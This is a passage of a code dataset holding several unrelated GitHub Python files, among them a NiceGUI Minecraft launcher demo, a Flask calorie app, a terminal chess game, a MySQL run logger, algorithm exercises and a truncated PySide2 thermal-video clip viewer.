Successfully.')\r\n except Exception as e:\r\n print(f'[ERROR] Failed when unpacking: {e}')\r\n\r\ndef change_version():\r\n print('Version changed')\r\n\r\ntry:\r\n with open(os.path.join(cwd, 'version.lnxt')) as verreadf:\r\n verread = verreadf.read()\r\n versions = verread.split('\\n')\r\n print('[INFO] Config loaded.')\r\nexcept FileNotFoundError:\r\n print('[WARN] Config file not detected.')\r\n\r\n@ui.page('/')\r\ndef index():\r\n ui.label('Demo').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n\r\n def show(event):\r\n name = type(event.sender).__name__\r\n ui.notify('value已设定为:114514')\r\n\r\n ui.button('按钮 (连点来测手速)', on_click=lambda: ui.notify('点,点,点击'))\r\n\r\n with ui.row():\r\n ui.checkbox('向互联网泄露你的隐私', value=True)\r\n ui.switch('千万不要反复扳动这个开关!', on_change=show)\r\n\r\n ui.radio(['A', 'B', 'C'], value='A').props('inline')\r\n\r\n with ui.row():\r\n ui.input('输入文字...')\r\n ui.select(['One', 'Two'], value='One')\r\n\r\n ui.link('在浏览器中像专业人士一样启动Minecraft?!', '/launcher').classes('mt-8')\r\n\r\n class Demo:\r\n def __init__(self):\r\n self.number = 1\r\n\r\n demo = Demo()\r\n\r\n ui.upload(on_upload=lambda e: ui.notify(f'已上传 {e.name}')).classes('max-w-full')\r\n\r\n ui.textarea(label='大输入框子!', placeholder='你好啊\\n你想在这里说些什么呢?\\n赶紧敲进来吧~', on_change=lambda e: result.set_text('啊,你输入了: ' + e.value))\r\n result = ui.label()\r\n\r\n v = ui.checkbox('启用某个非常秘密的控制面板', value=False)\r\n with ui.column().bind_visibility_from(v, 'value'):\r\n knob = ui.knob(0.3, show_value=True)\r\n with ui.knob(color='orange', track_color='grey-2').bind_value(knob, 'value'):\r\n ui.icon('volume_up')\r\n ui.slider(min=1, max=3).bind_value(demo, 'number')\r\n ui.toggle({1: 'A', 2: 'B', 3: 'C'}).bind_value(demo, 'number')\r\n ui.number().bind_value(demo, 'number')\r\n label = ui.label('变色龙?')\r\n ui.color_input(label='色', value='#000000', on_change=lambda e: label.style(f'color:{e.value}'))\r\n ui.date(value='2023-1-1', on_change=lambda e: result.set_text(e.value))\r\n result = ui.label()\r\n ui.time(value='11:45', on_change=lambda e: result.set_text(e.value))\r\n result = ui.label()\r\n\r\n@ui.page('/launcher')\r\ndef launch():\r\n def login():\r\n print('[INFO] Launching login process')\r\n unpack('launcher.dll', os.path.join(cwd, 'lnxt', 'launcher'))\r\n os.system(os.path.join(cwd, 'lnxt', 'launcher', 'cmcl.exe account --login=authlib --address=https://littleskin.cn/api/yggdrasil'))\r\n os.system(f'del /q \"{os.path.join(cwd, \"lnxt\", \"launcher\", \"cmcl.exe\")}\"')\r\n\r\n def login_offline():\r\n username = 'Steve'\r\n print('[INFO] Launching login process')\r\n unpack('launcher.dll', os.path.join(cwd, 'lnxt', 'launcher'))\r\n os.system(os.path.join(cwd, 'lnxt', 'launcher', f'cmcl.exe account --login=offline --name={username}'))\r\n os.system(f'del /q \"{os.path.join(cwd, \"lnxt\", \"launcher\", \"cmcl.exe\")}\"')\r\n\r\n def register():\r\n print('[INFO] Launching browser')\r\n os.system('start https://littleskin.cn/')\r\n\r\n def check_update():\r\n print('[INFO] Checking update from the server...')\r\n\r\n def launch_mc(version):\r\n footer.toggle()\r\n launch_bt.visible = False\r\n ver_name = f'\"{version}\"'\r\n\r\n #[[Inject the launch code here]]\r\n\r\n launch_bt.visible = True\r\n\r\n with ui.header().classes(replace='row items-center') as header:\r\n ui.button(icon='style').props('flat color=white')\r\n with ui.tabs() as tabs:\r\n ui.tab('启动')\r\n ui.tab('版本')\r\n ui.tab('下载')\r\n ui.tab('Mod管理')\r\n ui.tab('选项')\r\n\r\n with ui.footer(value=False) as footer:\r\n with ui.column():\r\n 
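# Hidden by default (value=False); launch_mc() toggles it while the game is starting.\r\n            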
ui.label('正在启动Minecraft').style('color: #FFFFFF; font-size: 200%; font-weight: 300')\r\n # To use the progressbar(which is developing) with no actural use:\r\n # progressbar = ui.linear_progress(value=0).props('instant-feedback')\r\n ui.label('请耐心等待...')\r\n\r\n with ui.page_sticky(position='bottom-right', x_offset=20, y_offset=20):\r\n launch_bt = ui.button(on_click=launch_mc, icon='rocket').props('fab')\r\n\r\n with ui.tab_panels(tabs, value='启动').classes('w-full'):\r\n with ui.tab_panel('启动'):\r\n ui.label('启动面板').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n ui.separator()\r\n with ui.column():\r\n ver_select = ui.select(versions, value=str(versions[0]))\r\n ui.button('管理登录', on_click=login).tooltip('管理Littleskin登录通行证')\r\n checkbox = ui.checkbox('使用离线登录 (你将无法使用多人游戏功能)')\r\n chk_var = ui.checkbox('补全文件 (会拖慢启动速度,但能解决大部分问题)')\r\n\r\n with ui.tab_panel('下载'):\r\n ui.label('Content of B')\r\n\r\n with ui.tab_panel('选项'):\r\n dark = ui.dark_mode()\r\n ui.label('个性化').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n ui.label('切换主题:')\r\n ui.button('暗色', on_click=dark.enable)\r\n ui.button('亮色', on_click=dark.disable)\r\n ui.label('切换色调:')\r\n ui.button('默认蓝', on_click=lambda: ui.colors())\r\n ui.button('低调灰', on_click=lambda: ui.colors(primary='#555'))\r\n ui.separator()\r\n ui.label('Minecraft实例').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n with ui.column():\r\n switch1 = ui.switch('启用版本隔离')\r\n switch2 = ui.switch('强制使用指定Java')\r\n switch3 = ui.switch('DUMMY SWITCH')\r\n switch4 = ui.switch('switch me')\r\n switch5 = ui.switch('switch me')\r\n switch6 = ui.switch('switch me')\r\n ui.label('启动选项').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\nui.run(title='webUI')\r\n","repo_name":"ccjjfdyqlhy/LauncherNext","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74345800551","text":"\"\"\"\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\nFind the sum of all the primes below two million.\n1/15/17\n\"\"\"\n\n\ndef is_prime(num):\n \"\"\"\n Returns true for a prime number, otherwise false.\n \"\"\"\n import math\n\n\n if num % 2 == 0 and num > 2:\n return False\n for i in range(3, int(math.sqrt(num))+1, 2):\n if num % i == 0:\n return False\n return True\n\nprimes = list()\n\nfor i in range(3, 2000001, 2):\n if is_prime(i):\n primes.append(i)\n\nresult = sum(primes) + 2\n\n# print(primes)\nprint(result)\n","repo_name":"awarnes/projects","sub_path":"euler/problem10.py","file_name":"problem10.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70794206952","text":"from flask import Flask, render_template, request\r\nfrom temp import temp\r\nfrom calorie import Calorie\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('calories_form.html')\r\n\r\n@app.route('/calculate_calories', methods=['POST'])\r\ndef calculate_calories():\r\n weight = int(request.form['weight'])\r\n height = float(request.form['height'])\r\n age = int(request.form['age'])\r\n country = request.form['country'].lower()\r\n city = request.form['city'].lower()\r\n\r\n temperature = temp(country, city).get()\r\n calorie = Calorie(weight, height, age, temp=temperature)\r\n calculated_calories = calorie.calculate()\r\n\r\n return render_template('calories_result.html', 
calories=calculated_calories, temperature=temperature)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"mabdullahbaig/Real-time-Temperature-and-Calorie-App-in-Python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6213888549","text":"import random\n\nclass ChessGame:\n def __init__(self):\n self.pieces = {\n 'white': {\n 'Pawn': '\\u2659',\n 'Rook': '\\u2656',\n 'Knight': '\\u2658',\n 'Bishop': '\\u2657',\n 'Queen': '\\u2655',\n 'King': '\\u2654'\n },\n 'black': {\n 'Pawn': '\\u265F',\n 'Rook': '\\u265C',\n 'Knight': '\\u265E',\n 'Bishop': '\\u265D',\n 'Queen': '\\u265B',\n 'King': '\\u265A'\n }\n }\n self.board = self.initialize_board()\n\n @staticmethod\n def initialize_board():\n # Unicode characters for the chess pieces\n pieces = {\n 'white': {\n 'Pawn': '\\u2659',\n 'Rook': '\\u2656',\n 'Knight': '\\u2658',\n 'Bishop': '\\u2657',\n 'Queen': '\\u2655',\n 'King': '\\u2654'\n },\n 'black': {\n 'Pawn': '\\u265F',\n 'Rook': '\\u265C',\n 'Knight': '\\u265E',\n 'Bishop': '\\u265D',\n 'Queen': '\\u265B',\n 'King': '\\u265A'\n }\n }\n\n # Initialize an 8x8 chess board\n board = [[' ' for _ in range(8)] for _ in range(8)]\n\n # Place the pieces on the board\n for i in range(8):\n board[1][i] = pieces['black']['Pawn']\n board[6][i] = pieces['white']['Pawn']\n\n # Rooks\n board[0][0] = board[0][7] = pieces['black']['Rook']\n board[7][0] = board[7][7] = pieces['white']['Rook']\n\n # Knights\n board[0][1] = board[0][6] = pieces['black']['Knight']\n board[7][1] = board[7][6] = pieces['white']['Knight']\n\n # Bishops\n board[0][2] = board[0][5] = pieces['black']['Bishop']\n board[7][2] = board[7][5] = pieces['white']['Bishop']\n\n # Queens\n board[0][3] = pieces['black']['Queen']\n board[7][3] = pieces['white']['Queen']\n\n # Kings\n board[0][4] = pieces['black']['King']\n board[7][4] = pieces['white']['King']\n\n return board\n\n def get_piece_color(self, piece):\n if piece in self.pieces['white'].values():\n return 'white'\n elif piece in self.pieces['black'].values():\n return 'black'\n else:\n return None\n \n def print_board(self):\n print(' a b c d e f g h ')\n print(' +---+---+---+---+---+---+---+---+')\n for i, row in enumerate(self.board):\n print(f'{8-i} | ' + ' | '.join(row) + ' |')\n print(' +---+---+---+---+---+---+---+---+')\n\n def play_game(self):\n num_players = input(\"Enter the number of players (1 or 2): \")\n while num_players not in ['1', '2']:\n num_players = input(\"Invalid input. 
Please enter the number of players (1 or 2): \")\n\n if num_players == '1':\n players = [('Player', 'white'), ('Computer', 'black')]\n else:\n players = [('Player 1', 'white'), ('Player 2', 'black')]\n\n while True:\n for player, color in players:\n self.print_board()\n if player == 'Computer':\n piece_position, new_position = self.computer_move()\n else:\n piece_position = input(f\"{player}, enter the position of the piece to move (e.g., 'e2'): \")\n new_position = input(f\"{player}, enter the new position for the piece (e.g., 'e4'): \")\n self.move_piece(piece_position, new_position, color)\n\n def move_piece(self, piece_position, new_position, color):\n # Convert chess notation to board indices\n piece_x, piece_y = ord(piece_position[0]) - ord('a'), 8 - int(piece_position[1])\n new_x, new_y = ord(new_position[0]) - ord('a'), 8 - int(new_position[1])\n\n # Check if the move is allowed\n piece = self.board[piece_y][piece_x]\n target = self.board[new_y][new_x]\n if self.get_piece_color(piece) != color:\n print(\"Invalid move: the piece to move is not of your color.\")\n return\n if self.get_piece_color(piece) == self.get_piece_color(target):\n print(\"Invalid move: cannot move to a position occupied by a piece of the same color.\")\n return\n\n # Move the piece\n self.board[new_y][new_x] = self.board[piece_y][piece_x]\n self.board[piece_y][piece_x] = ' '\n\n def computer_move(self):\n # This is a very basic AI that chooses a random move.\n # You could replace this with a more sophisticated AI if you want.\n while True:\n piece_x = random.randint(0, 7)\n piece_y = random.randint(0, 7)\n new_x = random.randint(0, 7)\n new_y = random.randint(0, 7)\n if self.board[piece_y][piece_x] != ' ' and self.board[new_y][new_x] == ' ':\n piece_position = chr(piece_x + ord('a')) + str(8 - piece_y)\n new_position = chr(new_x + ord('a')) + str(8 - new_y)\n return piece_position, new_position\n\n\ngame = ChessGame()\ngame.print_board()\ngame.play_game()\n\n","repo_name":"FullByte/ASCIIgames","sub_path":"Chess/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28453156887","text":"\"\"\"\nLogs run metadata to MySQL.\n\"\"\"\n\nfrom typing import Optional\nimport sqlalchemy as db\n\nfrom ..dot import Dot\nfrom ..cli import console\n\n# Specify database configuration\nconfig = {\n 'host': 'localhost',\n 'port': 3307,\n 'user': 'root',\n 'password': 'password',\n 'database': 'meta'\n}\n\nengine: Optional[db.Engine] = None\nconnection: Optional[db.Connection] = None\n\n\ndef initialize():\n\n from ..shared import session\n if session.info.mysql:\n\n db_user = config.get('user')\n db_pwd = config.get('password')\n db_host = config.get('host')\n db_port = config.get('port')\n db_name = config.get('database')\n\n # Connection string\n connection_str = f'mysql+pymysql://{db_user}:{db_pwd}@{db_host}:{db_port}/{db_name}'\n\n # Connect to database\n global engine\n engine = db.create_engine(connection_str, echo=False)\n\n global connection\n connection = engine.connect()\n\n meta = db.MetaData()\n db.MetaData.reflect(meta, bind=engine)\n\n return engine, connection\n\n\ndef log_run(info: Dot):\n\n from ..shared import session\n if session.info.mysql:\n\n global engine\n global connection\n if connection is None or engine is None:\n engine, connection = initialize()\n\n meta = db.MetaData()\n db.MetaData.reflect(meta, bind=engine)\n\n table = meta.tables[\"runs\"]\n\n statement = 
(db.insert(table)\n                     .values(id=info.id,\n                             name=info.name,\n                             version=0,\n                             start_time=info.start_time))\n\n        connection.execute(statement)\n        connection.commit()\n\n\ndef log_metric(metric: Dot):\n\n    from ..shared import session\n    if session.info.mysql:\n\n        global engine\n        global connection\n        if connection is None or engine is None:\n            engine, connection = initialize()\n\n        meta = db.MetaData()\n        db.MetaData.reflect(meta, bind=engine)\n\n        table = meta.tables[\"metrics\"]\n\n        statement = (db.insert(table)\n                     .values(name=metric.name))\n\n        connection.execute(statement)\n        connection.commit()\n\n\nif __name__ == \"__main__\":\n    initialize()\n","repo_name":"msc5/ml","sub_path":"src/database/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"32131411599","text":"from sklearn.feature_extraction.text import TfidfVectorizer\r\nimport numpy as np\r\n\r\ndef search(query, documents):\r\n    # Initialize the vectorizer\r\n    vectorizer = TfidfVectorizer()\r\n\r\n    # Compute TF-IDF scores for every document in the corpus\r\n    tfidf_matrix = vectorizer.fit_transform(documents)\r\n\r\n    # Compute the TF-IDF score for the query\r\n    query_vector = vectorizer.transform([query])\r\n\r\n    # Find all documents that contain the keywords\r\n    found = False\r\n    for doc_index, doc in enumerate(documents):\r\n        if all(keyword in doc for keyword in query.split()):\r\n            found = True\r\n            break\r\n\r\n    # Print the search results\r\n    if found:\r\n        for doc_index, doc in enumerate(documents):\r\n            if all(keyword in doc for keyword in query.split()) and tfidf_matrix[doc_index, query_vector.indices[0]] > 0:\r\n                term_positions = {}\r\n                for term in query.split():\r\n                    positions = [i for i, token in enumerate(doc.split()) if token == term]\r\n                    term_positions[term] = positions\r\n                for term, positions in term_positions.items():\r\n                    print(f'Document {doc_index + 1}, index: {positions}')\r\n                print(f'Score= {round(tfidf_matrix[doc_index, query_vector.indices[0]], 4)}')\r\n\r\n    else:\r\n        print(\"No documents were found.\")\r\n\r\n","repo_name":"raishabirah/mesinPencari","sub_path":"tfIDF.py","file_name":"tfIDF.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"1637246105","text":"# greedy\n# sort first, then take prefix sums\n\n# n = int(input())\n# p = sorted(map(int,input().split()))\n# for i in range(1,n):\n#     p[i] += p[i-1]\n#\n# print(sum(p))\n#\n# # second solution\n# n = int(input())\n# p = sorted(map(int,input().split()),reverse=1)\n# ans = 0\n# for i in range(1,n+1):\n#     ans += (i*p[i-1])\n# print(ans)\n\n\n\n# example: https://www.acmicpc.net/problem/1931\n# sort ascending by end time\n# after taking one meeting, the next start time must be at least the previous end time\nn = int(input())\nt_data = []\nfor _ in range(n):\n    t_data.append(list(map(int,input().split())))\n\n# sort by the time each meeting ends\nt_data = sorted(t_data,key=lambda x:(x[1],x[0]))\nendtime = ans = 0\nfor i in range(n):\n    if endtime<=t_data[i][0]:\n        endtime = t_data[i][1]\n        ans+=1\nprint(ans)","repo_name":"GureumKim/BOJ","sub_path":"Greedy/greedy_11399.py","file_name":"greedy_11399.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"31400509004","text":"from world.content.astronomy import *\nimport math\nimport re\n\n\ndef _start(caller):\n    caller.ndb._menutree.terminal.on_begin_use(caller)\n\n\ndef node_program_helm(caller):\n    
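# Demo route readout: Euclidean distance d = sqrt(dx^2 + dy^2) in AU between two fixed bodies,\n    # with d / 0.0066 as a rough AU -> million-km conversion for display.\n    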
destination = PLANET_2\n current = PLANET_1\n x = math.pow(destination[\"x\"] - current[\"x\"], 2)\n y = math.pow(destination[\"y\"] - current[\"y\"], 2)\n raw_distance = round(math.sqrt(abs(x + y)), 4)\n distance = \"%s AU (%s mKM)\" % (raw_distance, round(raw_distance / 0.0066, 1))\n\n text = \"\"\"\n |wShip Status:|n In Orbit\n |wLocation:|n Atreus L2 Point\n |wNearest Body:|n Atreus\n |wDistance:|n 130,457km\n\n |wDestination:|n %s\n |wTravel Est:|n %s\n |wMax G-Force:|n 1g\n |wMax Speed:|n 3400 / 3400 km/s\n |wFuel Est:|n N/A\n |wRoute Calculated:|n |rNO|n\n\n |wIFF:|n |yWCFS-FOX|n\n |wThrusters:|n |gONLINE|n\n |wEngine:|n |gONLINE|n\n |wFuel Level:|n 1333.33 Litres\n \"\"\" % (destination[\"name\"], distance)\n\n options = [\n {\"key\": \"_default\", \"goto\": node_program_helm_parse},\n {\"key\": \"return\", \"goto\": _start},\n {\"key\": \"set\", \"goto\": \"22323\"},\n {\"key\": \"begin calc\", \"goto\": _begin_calc},\n {\"key\": \"reset\", \"goto\": _reset_nav},\n {\"key\": \"iff\", \"goto\": _toggle_iff}\n ]\n return text, options\n\n\ndef node_program_helm_parse(caller, raw_string):\n set_cmd = re.match(r'set (\\w+) to (\\w+|\\d+)', raw_string)\n if set_cmd:\n arg = set_cmd.group(1).lower()\n if \"destination\".startswith(arg):\n _set_destination(set_cmd.group(2))\n elif \"g-force\".startswith(arg):\n _set_g_force(set_cmd.group(2))\n elif \"speed\".startswith(arg):\n _set_speed(set_cmd.group(2))\n else:\n caller.msg(\"Invalid argument specified. Valid arguments: |wdestination, g-force, speed.|n\")\n return \"node_program_helm\"\n\n\ndef _set_destination(arg):\n pass\n\n\ndef _set_g_force(arg):\n pass\n\n\ndef _set_speed(arg):\n pass\n\n\ndef _toggle_iff(caller):\n caller.msg(\"You toggle IFF %s.\" % \"|gON|n\")\n return \"node_program_helm\"\n\n\ndef _reset_nav(caller):\n return \"node_program_helm\"\n\n\ndef _begin_calc(caller):\n return \"node_program_helm\"\n","repo_name":"biscuitWizard/evennia.singularity","sub_path":"singularity/menus/programs/ship_helm.py","file_name":"ship_helm.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15233738129","text":"#!/usr/bin/python2\n### Google Code Jam template\n# Futures\nfrom __future__ import division\nfrom __future__ import with_statement\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport heapq\n\n\n## Library\n# @memoized\ndef memoized(func):\n mem = {}\n\n def wrapped(*args):\n if args not in mem:\n mem[args] = func(*args)\n return mem[args]\n return wrapped\n\n## Input templates\n# Line as int\nreadint = lambda infile: int(infile.readline())\n# Line as many ints\nreadints = lambda infile: [int(s) for s in infile.readline().split()]\n\n\n# Base class\nclass ProblemSolver(object):\n def __init__(self):\n self.precalculate()\n\n def precalculate(self):\n raise NotImplementedError\n\n def process(self, infile, ncase):\n raise NotImplementedError\n\n def run(self, infile, outfile):\n cases = int(infile.readline())\n for ncase in range(cases):\n print(\"Case #{nc}\".format(nc=ncase + 1))\n # Perform all nessesary calculation\n data = self.process(infile, ncase=ncase)\n outfile.write(\"Case #{nc}: {data}\\n\".format(\n nc=ncase + 1, data=data))\n\n\n# Working class\nclass Solver(ProblemSolver):\n def precalculate(self):\n ## User code here\n pass\n\n def process(self, infile, ncase):\n ## User code here\n N = readint(infile)\n values = set(range(1, N + 1))\n A = readints(infile)\n B = 
readints(infile)\n # Build partial order\n less = defaultdict(lambda: set())\n for i, x in enumerate(A):\n prev = None\n for j, y in enumerate(A[:i]):\n if y >= x:\n less[j].add(i)\n if y == x - 1:\n prev = j\n if prev is not None:\n less[i].add(prev)\n Br = B[::-1]\n for i, x in enumerate(Br):\n prev = None\n for j, y in enumerate(Br[:i]):\n if y >= x:\n less[N - j - 1].add(N - i - 1)\n if y == x - 1:\n prev = j\n if prev is not None:\n less[N - i - 1].add(N - prev - 1)\n # Linearize\n sequence = []\n active = sorted(i for i in range(N) if not less[i])\n for i in active:\n del less[i]\n while active:\n current = heapq.heappop(active)\n sequence.append(current)\n for tgt, deps in list(less.items()):\n if current in deps:\n deps.remove(current)\n if not deps:\n del less[tgt]\n heapq.heappush(active, tgt)\n # Map back\n result = [None] * N\n for i, v in enumerate(sequence):\n result[v] = i\n return ' '.join(str(i + 1) for i in result)\n\n\n# Script code\nif __name__ == '__main__':\n ## Setup\n # Task letter\n from os.path import basename, splitext\n TASK = splitext(basename(__file__))[0]\n print(\"Task {}\".format(TASK))\n from sys import argv\n if len(argv) > 1:\n print(\"Filename given: {}\".format(argv[1]))\n FILE = splitext(argv[1])[0]\n else:\n FILE = TASK\n ## Precalculation\n print(\"Initialization...\")\n solver = Solver()\n print(\"Initialization done.\")\n ## Calculation\n print(\"Calculation...\")\n with open(FILE + \".in\") as infile:\n with open(FILE + \".out\", mode=\"wt\") as outfile:\n solver.run(infile, outfile)\n print(\"Calculation done.\")\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/13/43/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"9260439801","text":"\nimport sys\nimport time\nimport traceback\n\nimport cv2\nimport h5py\nimport matplotlib\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PySide2.QtCore import Slot\nfrom PySide2.QtGui import QPixmap, QImage, qRgb\nfrom PySide2.QtWidgets import QApplication, QComboBox, QHBoxLayout, QMainWindow, QPushButton, QVBoxLayout, QWidget, \\\n QLabel, QStatusBar, QScrollArea\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n\nfrom preprocess.image_sizing import IMAGE_DIMENSION\nfrom support.track_utils import extract_hdf5_frames, convert_frames, clip_and_scale, extract_hdf5_crops, FRAME_DIMS, \\\n normalize, prune_frames, smooth_resizer\n\nmatplotlib.use('Qt5Agg')\n\n\nDATASET_PATH = '/home/dennis/projects/irvideos/working-data/problem-clips.hdf5'\nCLIP_DIMS = [IMAGE_DIMENSION, IMAGE_DIMENSION]\nFIGURE_DPI = 100.0\n\n\nclass ViewTrack:\n\n def __init__(self, clip_id, track_id, background, track_hdf5):\n self.track_id = track_id\n self.background = background\n self.tag = track_hdf5.attrs['tag']\n frames = extract_hdf5_frames(track_hdf5['original'])\n self.camera_frames = frames\n self.difference_frames = self.camera_frames - background\n bounds = track_hdf5.attrs['bounds_history']\n self.raw_bounds = bounds\n crops = extract_hdf5_crops(track_hdf5['cropped'])\n self.raw_crops = crops\n masses = track_hdf5.attrs['mass_history']\n ocrops, oframes, obounds, omasses, _ = prune_frames(crops, frames, bounds, masses, clip_id, track_id)\n ratiofn = smooth_resizer(IMAGE_DIMENSION)\n aframes, obounds, ratios = convert_frames(frames, background, bounds, IMAGE_DIMENSION, ratiofn)\n self.adjust_crops = ocrops\n 
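# Full frames re-cropped and smoothly resized to the square IMAGE_DIMENSION network input.\n        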
self.adjust_frames = aframes\n self.frame_bounds = obounds\n self.adjust_masses = omasses\n self.ratios = ratios\n self.current_index = 0\n\n def current_data(self):\n index = self.current_index\n print(f'returning acrop with shape {self.adjust_crops[index].shape}')\n return self.camera_frames[index], self.difference_frames[index], self.raw_crops[index], self.adjust_crops[index], self.adjust_frames[index], self.frame_bounds[index], self.adjust_masses[index]\n\n def next(self):\n if self.has_next():\n self.current_index += 1\n return self.current_data()\n\n def last(self):\n if self.has_last():\n self.current_index -= 1\n return self.current_data()\n\n def has_next(self):\n return self.current_index < len(self.adjust_frames) - 1\n\n def has_last(self):\n return self.current_index > 0\n\n\n\nclass ViewClip:\n\n def __init__(self, clip_id, clip_hdf5):\n self.clip_id = clip_id\n self.device_name = clip_hdf5.attrs.get('device')\n self.frames_per_second = clip_hdf5.attrs['frames_per_second']\n self.start_time = clip_hdf5.attrs['start_time']\n self.location = clip_hdf5.attrs.get('location')\n self.view_tracks = []\n self.background_frame = np.array(clip_hdf5['background_frame'])\n for key in clip_hdf5:\n try:\n if not key == 'background_frame':\n self.view_tracks.append(ViewTrack(clip_id, key, self.background_frame, clip_hdf5[key]))\n except Exception:\n print(f'Exception processing {clip_id}-{key}')\n traceback.print_exc()\n self.current_index = 0\n\n def current_track(self):\n return self.view_tracks[self.current_index]\n\n def last(self):\n if self.has_last():\n self.current_index -= 1\n return self.current_track()\n\n def has_next(self):\n return self.current_index < len(self.view_tracks) - 1\n\n def has_last(self):\n return self.current_index > 0\n\n\nclass Navigator:\n\n def __init__(self, clip_keys, clips_hdf5):\n self.clip_keys = clip_keys\n self.clips_hdf5 = clips_hdf5\n self.current_index = 0\n self.current_clip = None\n\n def current_data(self):\n clip_key = self.clip_keys[self.current_index]\n if self.current_clip is None or not self.current_clip.clip_id == clip_key:\n self.current_clip = ViewClip(clip_key, self.clips_hdf5[clip_key])\n return self.current_clip\n\n def next(self):\n if self.has_next():\n self.current_index += 1\n return self.current_data()\n\n def last(self):\n if self.has_last():\n self.current_index -= 1\n return self.current_data()\n\n def has_next(self):\n return self.current_index < len(self.clip_keys) - 1\n\n def has_last(self):\n return self.current_index > 0\n\n\nclass ViewerWindow(QMainWindow):\n\n def __init__(self, frame_dims, clip_dims, navigator):\n super().__init__()\n self.data_navigator = navigator\n self.frame_dims = frame_dims\n self.view_window = QWidget()\n self.setCentralWidget(self.view_window)\n main_layout = QVBoxLayout()\n self.top_label = QLabel()\n main_layout.addWidget(self.top_label)\n full_frame_layout = QHBoxLayout()\n full_frame_layout.addStretch()\n self.frame_display_dims = tuple([d * 2 for d in reversed(frame_dims)])\n w, h = self.frame_display_dims\n self.figure_index = 0\n self.cframe_figure = self._add_figure(h, w, full_frame_layout)\n self.dframe_figure = self._add_figure(h, w, full_frame_layout)\n self.bframe_figure = self._add_figure(h, w, full_frame_layout)\n full_frame_layout.addStretch()\n main_layout.addLayout(full_frame_layout)\n clips_layout = QHBoxLayout()\n main_layout.addLayout(clips_layout)\n clips_layout.addStretch()\n self.clip_display_dims = tuple([d * 5 for d in reversed(clip_dims)])\n h, w = 
self.clip_display_dims\n self.rcrop_label = self._add_label(h, w, clips_layout)\n self.acrop_label = self._add_label(h, w, clips_layout)\n self.xcrop_label = self._add_label(h, w, clips_layout)\n clips_layout.addStretch()\n self.frame_label = QLabel()\n main_layout.addWidget(self.frame_label)\n self.thumbnails_layout = QHBoxLayout()\n self.image_labels = []\n container_widget = QWidget()\n container_widget.setLayout(self.thumbnails_layout)\n scroll_area = QScrollArea()\n scroll_area.setWidget(container_widget)\n main_layout.addWidget(scroll_area)\n display_controls_layout = QHBoxLayout()\n main_layout.addLayout(display_controls_layout)\n self.last_view_button = self._add_button('<<', 120, display_controls_layout)\n self.last_view_button.clicked.connect(self._last_view_button)\n self.track_combo_box = self._add_combo_box([], 120, display_controls_layout)\n self.last_frame_button = self._add_button('<', 120, display_controls_layout)\n self.last_frame_button.clicked.connect(self._last_frame_button)\n self.play_button = self._add_button('Play', 120, display_controls_layout)\n self.play_button.clicked.connect(self._play_button)\n self.play_button.setAutoRepeat(True)\n self.play_button.setAutoRepeatInterval(1000)\n self.next_frame_button = self._add_button('>', 120, display_controls_layout)\n self.next_frame_button.clicked.connect(self._next_frame_button)\n self.next_view_button = self._add_button('>>', 120, display_controls_layout)\n self.next_view_button.clicked.connect(self._next_view_button)\n display_controls_layout.addStretch()\n self.status_bar = QStatusBar()\n self.status_bar.showMessage('Initializing...')\n main_layout.addWidget(self.status_bar)\n self.view_window.setLayout(main_layout)\n self.set_clip(navigator.current_data)\n\n @Slot()\n def _next_view_button(self):\n self.set_clip(self.data_navigator.next)\n\n @Slot()\n def _last_view_button(self):\n self.set_clip(self.data_navigator.last)\n\n @Slot()\n def _next_frame_button(self):\n self.set_frame(self.view_track.next)\n\n @Slot()\n def _last_frame_button(self):\n self.set_frame(self.view_track.last)\n\n @Slot()\n def _play_button(self):\n self.set_frame(self.view_track.next)\n\n @Slot()\n def _track_combo(self):\n track_id = self.track_combo_box.currentText()\n view_track = [t for t in self.view_clip.view_tracks if t.track_id == track_id][0]\n self.set_track(view_track)\n\n def _add_button(self, text, maxwidth, layout):\n layout.addSpacing(40)\n button = QPushButton(text)\n button.setFixedWidth(maxwidth)\n layout.addWidget(button)\n #button.setStyleSheet('background-color: AliceBlue;')\n return button\n\n def _add_combo_box(self, choices, maxwidth, layout):\n layout.addSpacing(40)\n combo_box = QComboBox()\n combo_box.addItems(choices)\n combo_box.setFixedWidth(maxwidth)\n layout.addWidget(combo_box)\n return combo_box\n\n def _add_label(self, h, w, layout):\n layout.addSpacing(40)\n label = QLabel()\n print(f'setting label height {h}, width {w}')\n label.setFixedSize(w, h)\n 